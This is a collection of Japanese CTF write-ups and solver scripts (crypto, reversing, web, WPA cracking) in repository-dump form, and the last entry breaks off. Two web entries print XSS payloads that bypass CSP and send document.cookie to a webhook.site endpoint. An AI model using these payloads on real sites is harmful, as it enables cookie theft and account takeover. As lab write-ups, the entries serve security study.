flag{abcdefg}\n```\n\nセルの中身を見てみると、`Plaintext`は`CONCATENATE(Q81:Q208)`の値が入ることが分かる。\n\n![](img/2020-11-14-12-37-10.png)\n\nまた、`Key`を変えると`(Q81:Q208)`の値が変わり、`Plaintext`も変化する。そして`Key`がフラグになっているようだ。\n\n![](img/2020-11-14-12-40-39.png)\n\n81行目から208行目を見てみる。\n\nどうやら白文字にして値を隠しているので文字色を変えてみる。\n\n(key = abcdefghi)\n![](img/2020-11-14-13-22-06.png)\n\nまた、`A29`,`M80`には以下のメッセージが隠されている。\n\n```\nHint: can you write an encryption algorithm that undoes the decryption algorithm below?\n\nFinding the right difference between ascii codes (hint: the value must be > 0, but less than 26. Why < 26?) Another hint: we repeat the alphabet at E26!\n```\n\nCiphertextとKeyのASCIIコードの差がL列に反映されていて、そのL列をKeyのアルファベット位置(index)分前にRotationしたものがPlaintextになっている。\n\n`Plaintext = ROT(chr((ord(cipertext) - ord(key))), -index(key))`\n\nこれを踏まえると暗号化は、\n\n`Ciphertext = chr(ord(key)+ord(ROT(plaintext,index(key))))`\n\nと書ける。\n\n暗号化の方法が分かったので、plaintextが分かればkeyも分かるのだが...\n\nkeyの9文字の単語で思い当たった`squarectf`を試しに入れてみると、\n\n![](img/2020-11-14-18-29-51.png)\n\n偶然それっぽくなってしまった。 どうやるのが正攻法なのだろうか...。\n\n<!-- flag{squarectf} -->\n" }, { "alpha_fraction": 0.6343426704406738, "alphanum_fraction": 0.6834036111831665, "avg_line_length": 33.78666687011719, "blob_id": "2dbfb50b89b7edaba5292bbf2601d3a83fe71911", "content_id": "a4a6a618616421be0abe1193b281eefe40d6ab2b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 3165, "license_type": "no_license", "max_line_length": 287, "num_lines": 75, "path": "/2021/WeCTF_2021/CSP_1/writeup.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# Writeup\n\n[csp1.sf.ctf.so](http://csp1.sf.ctf.so/) にアクセスすると、入力フォームが表示される。\n\n![](img/2021-06-20-12-58-22.png)\n\nscriptタグでXSSを試みる。\n\n```js\n<script>document.write(\"hoge\");</script>\n```\n\nスクリプトの実行はContent Security Policy(CSP)によって防がれている。\n\n```\nRefused to execute inline script because it violates the following Content Security Policy directive: \"script-src 'none'\". Either the 'unsafe-inline' keyword, a hash ('sha256-j6r2Eh5tpXDVkX3teOfQfOcZzBMcX025w27wtNr3XAc='), or a nonce ('nonce-...') is required to enable inline execution.\n```\n\nソースコードを見ると、imgタグのsrc要素の値をCSPのヘッダに含めることができると分かる。\n\n```py\ndef filter_url(urls):\n domain_list = []\n for url in urls:\n domain = urllib.parse.urlparse(url).scheme + \"://\" + urllib.parse.urlparse(url).netloc\n if domain:\n domain_list.append(domain)\n return \" \".join(domain_list)\n\ndef display(token):\n user_obj = Post.select().where(Post.token == token)\n content = user_obj[-1].content if len(user_obj) > 0 else \"Not Found\"\n img_urls = [x['src'] for x in bs(content).find_all(\"img\")]\n tmpl = render_template(\"display.html\", content=content)\n resp = make_response(tmpl)\n resp.headers[\"Content-Security-Policy\"] = \"default-src 'none'; connect-src 'self'; img-src \" \\\n f\"'self' {filter_url(img_urls)}; script-src 'none'; \" \\\n \"style-src 'self'; base-uri 'self'; form-action 'self' \"\n return resp\n```\n\nscriptタグを実行させるためには`script-src 'none'`の部分をどうにかして無効化しなくてはならない。\n\nCSPヘッダに挿入される値はURLパースされるが、ドメイン部分に`/`が来るまで自由な値が書ける。\n\nこれを利用して以下のような入力をすると、\n\n```\n<img src=\"https://webhook.site ;script-src 'nonce-hoge'\"/>\n```\n\nCSPヘッダは次のようになる。\n\n```\nConnection: keep-alive\nContent-Encoding: gzip\nContent-Security-Policy: default-src 'none'; connect-src 'self'; img-src 'self' https://webhook.site ;script-src 'nonce-hoge'; script-src 'none'; style-src 'self'; base-uri 'self'; form-action 'self'\nContent-Type: text/html; charset=utf-8\nDate: Sun, 20 Jun 2021 11:10:56 GMT\nServer: nginx/1.18.0 (Ubuntu)\nTransfer-Encoding: chunked\n```\n\nこのようにCSPヘッダを設定すると、`<script nonce=\"hoge\"></script>`内のスクリプトが実行できるようになるので、XSSを行う。\n\n```js\n<img src=\"https://webhook.site ;script-src 'nonce-hoge'\"/>\n<script nonce=\"hoge\">location.href=\"https://webhook.site/e27c0501-e42a-4eb9-a573-ef6cf99e8f90/?q=\"+document.cookie;</script>\n```\n\nあとは[uv.ctf.so](https://uv.ctf.so/)を使い、adminユーザーに上記スクリプトが実行される`http://csp1.ny.ctf.so/display/664f79ba-dccc-4589-9048-960aa0b9b4e3`にアクセスしてもらえばcookieを取得できる。\n\n![](img/2021-06-20-21-54-41.png)\n\n<!-- we{2bf90f00-f560-4aee-a402-d46490b53541@just_L1k3_<sq1_injEcti0n>} -->\n" }, { "alpha_fraction": 0.4411473870277405, "alphanum_fraction": 0.6567754745483398, "avg_line_length": 22.511627197265625, "blob_id": "9b728dbcf50581bae955456996c2384de1852013", "content_id": "63aa324762e5868bf7e512f1fc3c66353ad3f24d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1113, "license_type": "no_license", "max_line_length": 214, "num_lines": 43, "path": "/2021/BCACTF_2.0/Storytime_The_Tragic_Interlude/writeup.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# Writeup\n\n実行ファイルが与えられる。\n\n```bash\n$ file story2\nstory2: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=1e3cbcc533556d3e4ce1edb0848a21cef1b10365, for GNU/Linux 3.2.0, not stripped\n```\n\nGhidraで解析する。以下の部分が怪しい。\n\n```c\n while (local_724 < 0x25) {\n *(char *)((long)&local_38 + (long)local_724) =\n (char)local_724 + (char)(*(int *)((long)&local_718 + (long)local_724 * 4) >> 1);\n local_724 = local_724 + 1;\n }\n```\n\n```\n*(char *)((long)&local_38 + (long)local_724)\n\n↓\n\n001013fa 88 54 05 d0 MOV byte ptr [RBP + RAX*0x1 + -0x30],DL\n```\n\nこの命令の後にBreakpointを設定しDLの値を監視していく。\n\n```gdb\nb *main+(0x1013fe-0x1011e4)\n\ndisp $dl\n```\n\n```py\ndl = [0x62,0x63,0x61,0x63,0x74,0x66,0x7b,0x74,0x68,0x34,0x74,0x5f,0x30,0x74,0x68,0x33,0x72,0x5f,0x64,0x72,0x34,0x67,0x30,0x6e,0x5f,0x37,0x36,0x66,0x77,0x38,0x6b,0x63,0x31,0x6c,0x61,0x76,0x7d]\n\nfor d in dl:\n print(chr(d),end='')\n```\n\n<!-- bcactf{th4t_0th3r_dr4g0n_76fw8kc1lav} -->\n" }, { "alpha_fraction": 0.6363636255264282, "alphanum_fraction": 0.8030303120613098, "avg_line_length": 27.285715103149414, "blob_id": "a6d2058c807931efe13721195de6aa22067f8866", "content_id": "191070fb4aebed46a8883262ddfa783b22f789cc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 208, "license_type": "no_license", "max_line_length": 97, "num_lines": 7, "path": "/2021/SECCON_Beginners_CTF_2021/p-8RSA/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "It looks someone is encrypting it with RSA.\n\n[p-8RSA.tar.gz](https://beginners-dist-production.s3.isk01.sakurastorage.jp/p-8RSA/p-8RSA.tar.gz)\n\n909a5db23e24c1e89177cef165426efb571e6679\n\n想定難易度: Hard\n" }, { "alpha_fraction": 0.25071224570274353, "alphanum_fraction": 0.7849003076553345, "avg_line_length": 17.972972869873047, "blob_id": "138dc1a5ee0f656f52ab710ad6f0c6117b42ba7e", "content_id": "68cda25022e607f930dc5d7b0f250b345ab29a4f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 822, "license_type": "no_license", "max_line_length": 68, "num_lines": 37, "path": "/2021/BCACTF_2.0/Slightly_Harder_RSA/writeup.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# Writeup\n\n以下のテキストが与えられる。\n\n```\nn = 947358141650877977744217194496965988823475109838113032726009\ne= 65537\nct=811950322931973288295794871117780672242424164631309902559564\n```\n\nRSA暗号で`n`が小さそうなので、factorDBで因数分解してみる。\n\n```\nn = 884666943491340899394244376743 * 1070864180718820651198166458463\n```\n\nであることが分かった。 `p, q` が分かったので復号化する。\n\n```py\nfrom Crypto.Util.number import *\n\nn = 947358141650877977744217194496965988823475109838113032726009\ne = 65537\nct = 811950322931973288295794871117780672242424164631309902559564\n\np = 884666943491340899394244376743\nq = 1070864180718820651198166458463\n\nassert n == p * q\n\nd = pow(e,-1,(p-1)*(q-1))\nmt = pow(ct,d,n)\n\nprint(long_to_bytes(mt))\n```\n\n<!-- bcactf{rsa_factoring} -->\n" }, { "alpha_fraction": 0.6496350169181824, "alphanum_fraction": 0.7034671306610107, "avg_line_length": 26.412500381469727, "blob_id": "e8babab31947e7c36608666bfb8890d81bca7412", "content_id": "2be7c62b50025f84f2a1dd1ef425d1fc4ef9e481", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 2706, "license_type": "no_license", "max_line_length": 183, "num_lines": 80, "path": "/2021/DiceCTF_2021/Babier_CSP/writeup.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# Writeup\n\n[babier-csp.dicec.tf](https://babier-csp.dicec.tf/)にアクセスする。\n\n![](img/2021-02-20-16-48-15.png)\n\nView Fruit をクリックすると、`https://babier-csp.dicec.tf/?name=orange`といった`name`クエリに入っている文字が表示される。ソースコードは以下。\n\n```js\nconst express = require('express');\nconst crypto = require(\"crypto\");\nconst config = require(\"./config.js\");\nconst app = express()\nconst port = process.env.port || 3000;\n\nconst SECRET = config.secret;\nconst NONCE = crypto.randomBytes(16).toString('base64');\n\nconst template = name => `\n<html>\n\n${name === '' ? '': `<h1>${name}</h1>`}\n<a href='#' id=elem>View Fruit</a>\n\n<script nonce=${NONCE}>\nelem.onclick = () => {\n location = \"/?name=\" + encodeURIComponent([\"apple\", \"orange\", \"pineapple\", \"pear\"][Math.floor(4 * Math.random())]);\n}\n</script>\n\n</html>\n`;\n\napp.get('/', (req, res) => {\n res.setHeader(\"Content-Security-Policy\", `default-src none; script-src 'nonce-${NONCE}';`);\n res.send(template(req.query.name || \"\"));\n})\n\napp.use('/' + SECRET, express.static(__dirname + \"/secret\"));\n\napp.listen(port, () => {\n console.log(`Example app listening at http://localhost:${port}`)\n})\n```\n\n`name`にスクリプトタグを入力してXSSできないか調べてみる。\n\n* https://babier-csp.dicec.tf/?name=%3Cscript%3Ealert(0);%3C/script%3E \n\nすると、開発者ツールに以下のメッセージが出ていた。\n\n```\nRefused to execute inline script because it violates the following Content Security Policy directive\n```\n\nどうやら、スクリプトタグについている`nonce`が一致していないとブロックされるらしい。\n\n以下のように`nonce`を含めると任意のスクリプトを実行できることがわかる。\n\n* https://babier-csp.dicec.tf/?name=%3Cscript%20nonce=LRGWAXOY98Es0zz0QOVmag==%3Ealert(0);%3C/script%3E\n\n問題文に\n\n> The admin will set a cookie secret equal to config.secret in index.js.\n\nとあるので、[Admin Bot](https://us-east1-dicegang.cloudfunctions.net/ctf-2021-admin-bot?challenge=babier-csp)にアクセスし、以下のURLを入力する。\n\n```url\nhttps://babier-csp.dicec.tf/?name=<script%20nonce=\"LRGWAXOY98Es0zz0QOVmag==\">%20window.open(\"https://webhook.site/485d646e-854c-4699-b351-86540967fce7?q=\"%2Bdocument.cookie);</script>\n```\n\nこれにより、Admin Botがsecretをクエリ文字列にいれてWebhookにアクセスする。\n\n![](img/2021-02-06-22-11-32.png)\n\nsecret が分かったので、https://babier-csp.dicec.tf/{secret} にアクセスする。ソースコードを見るとフラグが書かれていた。\n\n![](img/2021-02-06-22-11-11.png)\n\n<!-- dice{web_1s_a_stat3_0f_grac3_857720} -->" }, { "alpha_fraction": 0.7761194109916687, "alphanum_fraction": 0.7860696315765381, "avg_line_length": 66, "blob_id": "ac96eca51377676aeae0ebd79f61ab44fcbb6dee", "content_id": "a4d08389483014dcff97f6ea19fa895e39dd7df6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 201, "license_type": "no_license", "max_line_length": 123, "num_lines": 3, "path": "/2021/BCACTF_2.0/Little_e/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "Gerald's favorite prime is 3 and made it his public exponent; he keeps insisting that it's secure. Help me prove him wrong.\n\n[encrypted.txt](https://objects.bcactf.com/bcactf2/smallersa/encrypted.txt)\n" }, { "alpha_fraction": 0.7491748929023743, "alphanum_fraction": 0.7706270813941956, "avg_line_length": 39.46666717529297, "blob_id": "2104e9d3843252ed0bfa0907df45cf811c842ee6", "content_id": "f7dbc90723b1a2f22b43d18587ad374b92499d1c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 606, "license_type": "no_license", "max_line_length": 198, "num_lines": 15, "path": "/2021/BCACTF_2.0/FNES_1/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "My friend developed this encryption service, and he's been trying to get us all to use it. Sure, it's convenient and easy to use, and it allows you to send encrypted messages easily, and...\n\nWell, I want to get control of his service so I can monitor all the messages! I think he's hidden some features and files behind a secret admin passphrase. Can you help me access those hidden files?\n\n[fnes1.py](https://objects.bcactf.com/bcactf2/fnes-1/fnes1.py)\n\n`nc crypto.bcactf.com 49153`\n\nHint 1 of 2\n\nWhat changes between encryptions?\n\nHint 2 of 2\n\nCan you modify an encrypted message without knowing the key?" }, { "alpha_fraction": 0.4078303277492523, "alphanum_fraction": 0.554649293422699, "avg_line_length": 26.244443893432617, "blob_id": "b741dd3248196b3ad88fde2f6d9c5653a55795a7", "content_id": "c50962ba3f90aea951a0ac4bb1fd91a761551858", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1312, "license_type": "no_license", "max_line_length": 70, "num_lines": 45, "path": "/2021/UIUCTF_2021/CEO/writeup.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# Writeup\n\n`.cap`ファイルが与えられる。\n\n`aircrack-ng`を使って辞書攻撃をしたところ、パスワードが`nanotechnology`であることが分かった。\n\n```bash\n$ aircrack-ng megacorp-01.cap -w ~/john/rockyou.txt\nReading packets, please wait...\nOpening megacorp-01.cap\nRead 1914 packets.\n\n # BSSID ESSID Encryption\n\n 1 E4:95:6E:45:90:24 joesheer WPA (1 handshake)\n\nChoosing first network as target.\n\nReading packets, please wait...\nOpening megacorp-01.cap\nRead 1914 packets.\n\n1 potential targets\n\n Aircrack-ng 1.6\n\n [00:04:14] 5325566/14344391 keys tested (21254.74 k/s)\n\n Time left: 7 minutes, 4 seconds 37.13%\n\n KEY FOUND! [ nanotechnology ]\n\n\n Master Key : 12 71 F9 32 8F FA BF E0 E2 80 F5 D3 F8 E0 A7 C0\n 73 E1 BB 0C AE 51 08 DA CF FD D3 7A 79 04 73 15\n\n Transient Key : CF AC 16 F6 95 E1 93 05 94 A2 43 EC 52 A8 AB C7\n 46 C5 45 71 16 5F 1C 82 27 1E 8C B2 B6 7E 03 33\n 6A 16 E3 15 4E 39 4E EC 4F DB 35 3C CF 95 D7 9A\n F7 BF 06 69 E4 4F 34 D4 04 B0 3F F2 AC D7 7B 6C\n\n EAPOL HMAC : 06 C0 57 DC F4 DD 8F 2C F5 98 99 19 9E E3 45 32\n```\n\n<!-- uiuctf{nanotechnology} -->\n" }, { "alpha_fraction": 0.5160680413246155, "alphanum_fraction": 0.5992438793182373, "avg_line_length": 15.030303001403809, "blob_id": "e8e40d87b1249232f37ad92da3ccf5c57cdac6fa", "content_id": "71ba5897df5a4fc198b4b5f10193013cdecc0e8c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 715, "license_type": "no_license", "max_line_length": 60, "num_lines": 33, "path": "/2021/redpwnCTF_2021/round-the-bases/writeup.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# Writeup\n\nテキストが与えられる。\n\nテキストのパターンを調べると、以下の2つのテキストから構成されていることが分かった。\n\n```\n9mTfc:..Zt9mTZ_:IIcu9mTN[9km7D\n9mTfc:..Zt9mTZ_:K0o09mTN[9km7D\n9mTfc:..Zt9mTZ_:Jj8< (最後のみ)\n```\n\n`IIcu...`を`0`,`K0o0...`を`1`として変換してみる。\n\n`} = 0x7d = 0b01111101`だとすると、最後は`1`になるはずなので、`Jj8<`も`1`に変換する。\n\n```py\nfrom Crypto.Util.number import *\n\nc = open('round-the-bases','r').read()\nc = c.split('7D')\n\nb = ''\nfor d in c:\n if 'IIcu' in d:\n b += '0'\n else:\n b += '1'\n\nprint(long_to_bytes(int(b,2)))\n```\n\n<!-- flag{w0w_th4t_w4s_4ll_wr4pp3d_up} -->\n" }, { "alpha_fraction": 0.6777777671813965, "alphanum_fraction": 0.6777777671813965, "avg_line_length": 14, "blob_id": "a00ec058e1c1ddd07b219cfa4ae16b9e0ed7d21a", "content_id": "1f4f43af97d67d468f42d335990c556337963636", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 246, "license_type": "no_license", "max_line_length": 38, "num_lines": 12, "path": "/2021/ImaginaryCTF_2021/Hidden/writeup.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# Writeup\n\n.psd ファイルが与えられる。\n\n`strings`コマンドを実行したところ、フラグが得られた。\n\n```bash\n$ strings challenge.psd | grep ictf\nictf{wut_how_do_you_see_this}\n```\n\n<!-- ictf{wut_how_do_you_see_this} -->\n" }, { "alpha_fraction": 0.2515822649002075, "alphanum_fraction": 0.3322784900665283, "avg_line_length": 22.44444465637207, "blob_id": "738864c614b51315b131f4d108e0fe9b88be04e8", "content_id": "06af81eec76991b01e3b30dbdd2ab3e239588542", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 634, "license_type": "no_license", "max_line_length": 99, "num_lines": 27, "path": "/2020/hxp_CTF_2020/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# hxp CTF 2020\n\n* https://2020.ctf.link/\n\n* 2020/12/19 00:00 JST — 2020/12/21 00:00 JST\n\n## My Challenges\n\n### Solved\n\n| tag | problem | comment | score | solved |\n| ------ | -------------------------------------- | ---------------------------- | ----: | -----: |\n\n### Unsolved\n\n| tag | problem | comment | score | solved |\n| ------ | --------------------- | ------- | ----: | -----: |\n| Crypto | nanothorpe | | 110 | 82 |\n| Misc | Secure Program Config | | 106 | 85 |\n\n---\n\n## Result\n\n* 19 points\n\n* 184 / 532 (> 1 pt)" }, { "alpha_fraction": 0.3987560570240021, "alphanum_fraction": 0.5348997712135315, "avg_line_length": 18.554054260253906, "blob_id": "58e0ab435457734afdf39789664117c9d2a1ded9", "content_id": "0ce091d21c7b0ab44116fe2e362b318328fb4f03", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1577, "license_type": "no_license", "max_line_length": 128, "num_lines": 74, "path": "/2021/BCACTF_2.0/Wasm_Protected_Site_2/writeup.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# Writeup\n\nhttp://web.bcactf.com:49158/ にアクセスする。\n\n`Wasm Protect Site 1`と同様にwasmを見る。\n\n```wasm\n(module\n (memory $memory (;0;) (export \"memory\") 1)\n (func $cmp (;0;) (param $v0 (;0;) i32) (param $v1 (;1;) i32) (result i32)\n (local $v2 (;2;) i32)\n loop $label0\n local.get $v2\n local.get $v0\n i32.add\n i32.load8_u\n local.get $v2\n local.get $v1\n i32.add\n i32.load8_u\n local.get $v2\n i32.const 9\n i32.mul\n i32.const 127\n i32.and\n i32.xor\n i32.ne ★\n local.get $v2\n i32.const 27\n i32.ne\n i32.and\n if\n i32.const 0\n return\n end\n local.get $v2\n i32.const 1\n i32.add\n local.tee $v2\n i32.const 1\n i32.sub\n local.get $v0\n i32.add\n i32.load8_u\n i32.eqz\n if\n i32.const 1\n return\n end\n br $label0\n end $label0\n i32.const 0\n return\n )\n (func $checkFlag (;1;) (export \"checkFlag\") (param $a (;0;) i32) (result i32)\n local.get $a\n i32.const 1000\n call $cmp\n return\n )\n (data (i32.const 1000) \"bjsxPKMH|\\227N\\1bD\\043b]PR\\19e%\\7f/;\\17\")\n)\n```\n\n★ 部分で文字の比較を行っているので、Breakpointをつけて変数を監視する。`stack[1].value`に比較対象の文字コードが入っている。\n\n```py\nchar = [98, 99, 97, 99, 116, 102, 123, 119, 52, 115, 109, 45, 119, 49, 122, 52, 114, 68, 114, 121, 45, 88, 99, 48, 119, 90, 125]\n\nfor c in char:\n print(chr(c),end='')\n```\n\n<!-- bcactf{w4sm-w1z4rDry-Xc0wZ} -->\n" }, { "alpha_fraction": 0.6382978558540344, "alphanum_fraction": 0.8297872543334961, "avg_line_length": 27.399999618530273, "blob_id": "07288ba6ddf0d3a8a6b4fd7e759413e09b9e89a0", "content_id": "7798143e8de1f69f165e2e9efd488750b3b8ed1b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 141, "license_type": "no_license", "max_line_length": 86, "num_lines": 5, "path": "/2021/UMassCTF_2021/easteregg/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "Dangeresque likes easter eggs.\n\nhttp://static.ctf.umasscybersec.org/rev/9996d2d0-60d0-476c-9c85-a3b053f0a358/adventure\n\nCreated by Jakob#9448" }, { "alpha_fraction": 0.5082212090492249, "alphanum_fraction": 0.7593423128128052, "avg_line_length": 34.26315689086914, "blob_id": "1115b8afc82f91bfac736aba029c22bdb1d957dc", "content_id": "789d90022c9df1dbbfd840af2e93e863d3017052", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 669, "license_type": "no_license", "max_line_length": 254, "num_lines": 19, "path": "/2021/angstromCTF_2021/Exclusive_Cipher/solver.py", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "from itertools import cycle\nimport string\n\nc = 'ae27eb3a148c3cf031079921ea3315cd27eb7d02882bf724169921eb3a469920e07d0b883bf63c018869a5090e8868e331078a68ec2e468c2bf13b1d9a20ea0208882de12e398c2df60211852deb021f823dda35079b2dda25099f35ab7d218227e17d0a982bee7d098368f13503cd27f135039f68e62f1f9d3cea7c'\nc = bytes.fromhex(c)\nm = b'actf{'\n\ndef xor(text,key):\n return bytes([a ^ b for (a,b) in zip(text, cycle(key))])\n\ndef is_ascii(text):\n return all(char in bytes(string.printable,'ascii') for char in text)\n\nwhile len(c) > len(m):\n key = xor(c,m)[:5]\n plaintext = xor(c,key)\n if is_ascii(plaintext) and b'}' in plaintext:\n print(plaintext)\n c = c[1:]" }, { "alpha_fraction": 0.5181058645248413, "alphanum_fraction": 0.5668523907661438, "avg_line_length": 29.5744686126709, "blob_id": "ee18fc8a696201743d6bbe462ff9067e722c014b", "content_id": "ab3649a1ba31a8603fa93bc251d1c8f3fe12af1e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1436, "license_type": "no_license", "max_line_length": 107, "num_lines": 47, "path": "/2020/SquareCTF2020/Hash_My_Awesome_Commands/solver.py", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "from pwn import *\nimport base64\nimport struct\nimport re\n\nconn = remote('challenges.2020.squarectf.com',9020)\n\n# debug mode\nconn.recvuntil('Enter command:',drop=True)\nconn.sendline('debug|9W5iVNkvnM6igjQaWlcN0JJgH+7pComiQZYdkhycKjs=')\nconn.recvuntil('Enter command:',drop=True)\n\nresult = [0 for _ in range(2**8)]\n\npayload = b''\n\n# payload = b'\\x9d\\xd0(K<\\x7f\\t\\xb8\\xb3N\\xa3A\\x07\\x973\\xde\\xde\\x97\\x18Q\\x06m\\x0c\\x08s\\xd8\\xbbI\\xac\\x20\\x4c'\n\nfor j in range(1,33):\n\n buf = b'\\x00'*(32-j)\n\n top = [k for k in range(2**8)]\n while len(top) != 1:\n for i in range(2**8):\n if i not in top:\n continue\n data = struct.pack(\"B\",i) # \\x00 - \\xff\n data = payload + data + buf\n b64_data = base64.b64encode(data).decode()\n conn.sendline('flag|' + b64_data)\n conn.recvline()\n msg = conn.recvline().decode() # time info\n varify_time = int(re.sub(r\"\\D\",\"\",msg)) \n result[i] = [varify_time,i]\n print(i,msg,end='') # for debug\n skip = conn.recvuntil('Enter command:',drop=True)\n if(j == 32):\n print(skip) # flag check\n\n sort_result = sorted(result,reverse=True)\n topgroup = [x[1] for x in sort_result][:10] # just in case\n top = [x for x in top if x in topgroup]\n print('top: ', top)\n\n payload += struct.pack(\"B\",top[0])\n print('payload: ', payload)" }, { "alpha_fraction": 0.29507362842559814, "alphanum_fraction": 0.7176231741905212, "avg_line_length": 25.253334045410156, "blob_id": "11c115ce8da24dd8b6e8c906523208d416189b00", "content_id": "aa33abb7d423393a410748526266d1242b1f0ade", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 2087, "license_type": "no_license", "max_line_length": 171, "num_lines": 75, "path": "/2021/RaRCTF_2021/babycrypt/writeup.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# Writeup\n\n以下のプログラムが与えられる。\n\n```py\nfrom Crypto.Util.number import getPrime, bytes_to_long\n\nflag = bytes_to_long(open(\"/challenge/flag.txt\", \"rb\").read())\n\ndef genkey():\n e = 0x10001\n p, q = getPrime(256), getPrime(256)\n if p <= q:\n p, q = q, p\n n = p * q\n pubkey = (e, n)\n privkey = (p, q)\n return pubkey, privkey\n\ndef encrypt(m, pubkey):\n e, n = pubkey\n c = pow(m, e, n)\n return c\n\npubkey, privkey = genkey()\nc = encrypt(flag, pubkey)\n\nhint = pubkey[1] % (privkey[1] - 1)\nprint('pubkey:', pubkey)\nprint('hint:', hint)\nprint('c:', c)\n```\n\nRSA暗号の問題で、`e,n,c` と `hint = n % (q-1)` が既知である。\n\n```\npubkey: (65537, 8233844853736079846340942338892377350084205826692932262262169655906024996611709932668810597429977504654174681615645717480946467295158630669046073907212183)\nhint: 41162916934005887239397941494469703620898846542249479175280452807025539991659\nc: 2668213429910053210439086430709560263484415254994522634947359490234264025445117346305280609718185533536116506975101248392127837369553056944962889943997393\n```\n\n`hint = n % (q-1), p > q`より、\n\n```\nhint = p * q % (q-1)\nhint = p % (q-1)\nhint + i * (q-1) = p\np > q, p < 2q より、i = 1\nq(hint + (q-1)) = n\nq^2 + (hint - 1)q - n = 0\n```\n\nが成り立つ。`q`についての二次方程式を解けばよい。\n\n```py\n# sage\nfrom Crypto.Util.number import *\n\ne = 65537\nn = 8233844853736079846340942338892377350084205826692932262262169655906024996611709932668810597429977504654174681615645717480946467295158630669046073907212183\nhint = 41162916934005887239397941494469703620898846542249479175280452807025539991659\nc = 2668213429910053210439086430709560263484415254994522634947359490234264025445117346305280609718185533536116506975101248392127837369553056944962889943997393\n\nx = var('x')\ns = solve(x^2 + (hint - 1)*x - n == 0, x)\nq = int(s[0].right())\np = n // q\nassert p*q == n and p >= q\n\nd = power_mod(e, -1, (p-1)*(q-1))\nm = power_mod(c, d, n)\nprint(long_to_bytes(m))\n```\n\n<!-- rarctf{g3n3r1c_m4th5_equ4t10n_th1ng_ch4ll3ng3_5a174f54e6} -->\n" }, { "alpha_fraction": 0.6833333373069763, "alphanum_fraction": 0.8333333134651184, "avg_line_length": 24.714284896850586, "blob_id": "f8047fddeef47ec95cb833d1ce0608b3afc6c94f", "content_id": "fd1bc15b260f675d2e59b0751b1ffa26b7cf31b8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 242, "license_type": "no_license", "max_line_length": 94, "num_lines": 7, "path": "/2021/SECCON_Beginners_CTF_2021/please_not_trace_me/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "フラグを復号してくれるのは良いけど,表示してくれない!!\n\n[chall](https://beginners-dist-production.s3.isk01.sakurastorage.jp/please_not_trace_me/chall)\n\n7e3285ee71b14355a62e9fe2dcdb22ec2c13e080\n\n想定難易度: Easy\n" }, { "alpha_fraction": 0.5036208033561707, "alphanum_fraction": 0.5569453835487366, "avg_line_length": 16.261363983154297, "blob_id": "c1bb080f1f7c931ecd0a579830c5efd4e7bfab6a", "content_id": "45507bc7a81751c8623b8f584b01a30f1f271780", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1723, "license_type": "no_license", "max_line_length": 69, "num_lines": 88, "path": "/2020/WaniCTF/LCG_crack/writeup.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# Writeup\n\n`nc lcg.wanictf.org 50001`を実行。\n\n```bash\n$ nc lcg.wanictf.org 50001\n\n\n ::: .,-::::: .,-:::::/\n ;;; ,;;;'````',;;-'````'\n [[[ [[[ [[[ [[[[[[/\n $$' $$$ \"$$c. \"$$\n o88oo,.__`88bo,__,o,`Y8bo,,,o88o\n \"\"\"\"YUMMM \"YUMMMMMP\" `'YMUP\"YMM\n\n\n\n +=============================+\n | 1. Generate the next number |\n | 2. Guess the next number |\n | 3. Exit |\n +=============================+\n\n - Guess the numbers in a row, and I'll give you a flag!\n> 1\n11570939290553957957\n```\n\n`1`で乱数を生成、`2`で乱数を予測できる。\n\nどうやら、次の乱数を当て続ければフラグを取得できそう。\n\nしかし、プログラムを読むと`ValueError`でも`continue`する(先に進んでしまう)ので、`int`以外を入れ続けてもよい。\n\n```py\nexcept ValueError:\n print(\"Please enter an integer\\n\\n\\n\")\n continue\n```\n\nおそらく、非想定解だが...\n\n```bash\n> 2\n - [1/10] Guess the next number!\n> 